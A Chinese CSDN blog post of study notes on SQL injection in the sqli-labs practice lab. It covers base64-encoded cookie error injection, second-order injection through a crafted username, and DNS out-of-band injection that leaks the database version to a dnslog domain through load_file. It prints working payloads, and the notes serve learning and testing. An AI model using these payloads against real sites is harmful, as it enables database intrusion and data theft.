WEB漏洞-SQL注入之二次加解密,DNS等注入(学习笔记)

最新推荐文章于 2024-07-03 19:46:51 发布
最新推荐文章于 2024-07-03 19:46:51 发布
阅读量588 收藏
点赞数
分类专栏: 学习笔记 文章标签: 大数据 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19375535/article/details/125575006
版权

Cookile解码

sqlilab21关

首先填写信息(admin)抓包

 

将YWRtaW4%3D通过base64解密为admin 所以是cookie注入

将admin‘ and 1=1加密并发送数据包发现,会回显cookie

 

 

使用加密后的报错注入进行尝试

admin1')and extractvalue(1,concat(0x7e,(version()),0x7e))# 

base64加密后 YWRtaW4xJylhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHZlcnNpb24oKSksMHg3ZSkpIw==

admin' or updatexml(1,concat(0x7e,version()),0) or '

base64加密后

YWRtaW4nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLHZlcnNpb24oKSksMCkgb3IgJw==

admin' or updatexml(1,concat(0x7e,database()),0) or '

base64加密后

YWRtaW4nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCkpLDApIG9yICc=

 

sqlilab24关登陆框&二次注入(实际案例)

应用场景---在前端和URL(黑盒测试)是无法发现二次注入,无法用工具扫描,只有在代码审计时才能发现是否存在二次注入

 

原理 #登录册界面,包含insert语句 ---insert into news(id,url,text)values(2,’x’,’$t’)

#忘记密码,包含update语句 ---upadte user set pwd=’$t’ where id=2 and username=’admin’

#原理: ---注册用户: admin’ and 1=1 密码:123456 ---更新:upadte user set pwd=’$t’ where id=2 and username=’admin’ and 1=1’---形成了注入语句,同理如果:换成注册其它用户名,更新的时候也会形成不同的注入语句。

创建账户dhakkan'#并设置密码123456 使用该账户登录后,进入修改密码界面修改为xxxx,发现修改密码后dhakkan'#的密码没有变 而dhakkan密码变成了xxxx

#源代码分析: --- UPDATE users SET PASSWORD='sss' where username=' dhakkan'#' and password='123456' ---相当于#将后面注释了,改为:UPDATE users SET PASSWORD='sss' where username=' dhakkan' and password='123456'

sqlilabs-less9-load_file&dnslog 带外注入(实际案例) DNS漏洞注入

select * from users where id=1 and if((select load_file(concat('',(select version()),'.yk2kql.ceye.io//abc'))),0,1);

---concat连接符,先查询数据库版本,然后和网站的DNS路径进行对比

---yk2kql.ceye.io是网站DNS

通过命令行输入此语句,可以在DNS管理页面查看到注入语句中显示的内容

 

DnslogSqlinj工具 实例:sqlilabs第九关 ---设置URL格式 ---工具注入 ---获取当前用户和数据 ---获取数据库 --dbs

意义: 解决盲注不能回显数据---盲注比较繁琐,效率低的问题

sqlmap中的temper为工具文件夹,里面包含很多工具

通过编写php文件实现结合SQLmap工具,中转注入

 

 

[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
SQL注入漏洞-利用DNS进行盲注
HacHunter的博客
03-23 552
在windows下面,可以通过网络路径(NUC)来访问其他主机的资源。其格式如下: \\servername\sharename,其中servername是服务器名。sharename是共享资源的名称。 其中servername可以是主机IP或者域名 当servername是域名的时候,会通过DNS 把域名把dns解析为IP地址。 DNS 服务器:win2003,IP:10.1.1.31添加一条主机记录baidu.com 10.1.1.31 子域名test 委托到10.1.1.251 We..
DNS中的SQL注入攻击
netsec_steven的博客
10-09 1981
0x00 前言 原文地址:http://arxiv.org/ftp/arxiv/papers/1303/1303.3047.pdf 原文作者: Miroslav tampar 本文描述了一种利用DNS解析过程获取恶意SQL查询结果的先进的SQL注入技术。带有sql查询结果的DNS请求最终被攻击者控制的远程域名服务器拦截并提取出宝贵的数据。 开源SQL注入工具—SqlMap现在已
DNS注入
weixin_52351575的博客
09-20 575
DNS注入也称DNS带外注入DNSLog注入DNS(omainameystem)域名系统,将域名与IP地址相互映射的一个分布式数据库DNS注入核心是 将盲注变为。
mysql dns 注入_DNSlog应用
weixin_36296215的博客
01-27 230
————背景说明————在做渗透的时候,有一些漏洞发现无回显的,比如sql注入,一般当我们拿到一个无回显的注入,那么我们往往会采用盲注,使用二分法不断猜测字符等方式来取信息,不过这样的方式耗时又费力,而且频繁地测试容易被目标网站ban掉。那么面对盲注,或者是其他漏洞的盲打,有没有哪种方法,可以快速地获取我们需要的信息呢,答案是有的,即本篇主要说的,利用DNS快速获取数据,官方地讲即DNSlog。这...
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
WEB安全学习笔记
chenrs727的博客
12-02 2051
基础入门 1.基础入门——基础概念 域名 什么是域名 域名(英语:Domain Name),又称网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识(有时也指地理位置) 由于IP地址具有不方便记忆并且不能显示地址组织的名称和性质等缺点,人们设计出了域名,并通过网域名称系统(DNS,Domain Name System)来将域名和IP地址相互映射,使人更方便地访问互联网,而不用去记住能够被机器直接读取的IP地址数串。 比如www.bai
[网络安全自学篇] 八十五.《Windows黑客编程技术详解》之注入技术详解(全局钩子、远线程钩子、突破Session 0注入、APC注入
杨秀璋的专栏
06-25 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点,希望对您有所帮助。第二篇文章主要介绍4种常见的注入技术,包括全局钩子、远线程钩子、突破SESSION 0隔离的远线程注入、APC注入,案例包括键盘钩子、计算器远线程注入实现、APC注入等,希望对您有所帮助。
第17篇:WEB漏洞~SQL注入~二次加解密DNS注入
廖一语山的博客
07-31 610
小迪v6 二次注入加解密DNS外带
21-40关
bsaikfhgihwi的博客
02-08 383
第二十一关 本关和less-20相似,只是cookie的uname值经过base64编码了。 登录后页面: 圈出来的地方显然是base64加密过的,解码得到:admin,就是刚才登陆的uname,所以猜测:本题在cookie处加密了字符串, 查看php文件确实如此,所以只需要上传paylaod的时候base64加密一下就可以了。 先抓包看一下: hadow_10,text_aHR0cHM6Ly9...
SQL Server加密与解密(附SQLServer加密还原插件)
悦分享
12-19 1989
加密是指通过使用密钥或密码对数据进行模糊处理的过程。加密解密最简单的过程,如下图所示。通常来说,加密可以分为两大类,对称(Symmetric)加密和非对称(Asymmetric)加密。对称加密是那些加密和解密使用同一个密钥的加密算法,在图1中就是加密密钥=解密密钥。对称加密通常来说会比较羸弱,因为使用数据时不仅仅需要传输数据本身,还是要通过某种方式传输密钥,这很有可能使得密钥在传输的过程中被窃取。非对称加密是那些加密和解密使用不同密钥的加密算法,在图1中就是加密密钥!=解密密钥。
(6)web安全|渗透测试|网络安全 加解密文相关特征,附带超级加解密软件
02-15 806
(6)web安全|渗透测试|网络安全 加解密文相关特征,附带超级加解密软件
SQLi-Labs第24关
最新发布
rp114514的博客
07-03 242
通过这种方式,我学习了如何在新用户注册过程中操纵数据库,获取敏感数据或创建恶意用户。这次的学习不仅可以了解常见的SQL注入攻击,还能提升实际应用中保护数据库的能力。这一关的挑战让我们深刻认识到SQL注入攻击的威力以及常见Web应用中的安全漏洞。通过这次实践,我们不仅提高了攻击技术,还学会了如何在实际应用中防范类似的安全问题。修改好之后直接进行登录,发现admin账号以及成功变成了我们刚刚所修改的密码。登陆后发现下面有个可修改密码的地方于是我们直接去修改密码,注册一个新用户账号为admin'#,注册后登录。
SQL注入——sqli-labs第二十四关_sqli第二十四,资深网络安全开发带你入门Framework
2401_84103616的博客
04-04 937
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
SQL注入(2)——各种注入
realmels的博客
04-24 992
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 上一篇讲了SQL手工注入及简单的检测,今天来讲解各种类型的注入。 这里配合先前搭建好的sqli-lab进行测试 报错注入 报错注入主要是通过使数据库报错,从而获取信息。 这里报错函数主要是updatexml、ex.
30余种加密编码类型的密文特征分析(建议收藏)
热门推荐
爱国小白帽
11-11 4万+
一、md5 一般MD5值是32位由数字“0-9”和字母“a-f”所组成的字符串,如图。如果出现这个范围以外的字符说明这可能是个错误的md5值,就没必要再拿去解密了。16位值是取的是8~24位。 md5的三个特征: 确定性:一个原始数据的MD5值是唯一的,同一个原始数据不可能会计算出多个不同的MD5值。 碰撞性:原始数据与其MD5值并不是一一对应的,有可能多个原始数据计算出来的MD5值是一样的,这就是碰撞。 不可逆:也就是说如果告诉你一个MD5值,你是无法通过它还原出它的原始数据的,这不是你的技术不够牛,
密码重置
weixin_30674525的博客
05-29 387
http://nctf.nuptzj.cn/web13/index.php?user1=Y3RmdXNlcg== Y3RmdXNlcg==一看就是base64 解密ctfuser== 然后查看元代码 vcode user newpass 我的账号应该是管理员账号admin 编码YWRtaW4=%3d%3d 然后注入 flag is:nctf{reset_...
Web SQL注入漏洞扫描系统设计与防御策略
"该文探讨了基于WebSQL注入漏洞扫描系统的设计与研究,主要针对现代SQL注入检测的局限性,提出了一种新的检测方法。文章通过实验环境,使用Pubs数据库进行了SQL注入的测试,并提出了四点防御策略。" 在当前的信息...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值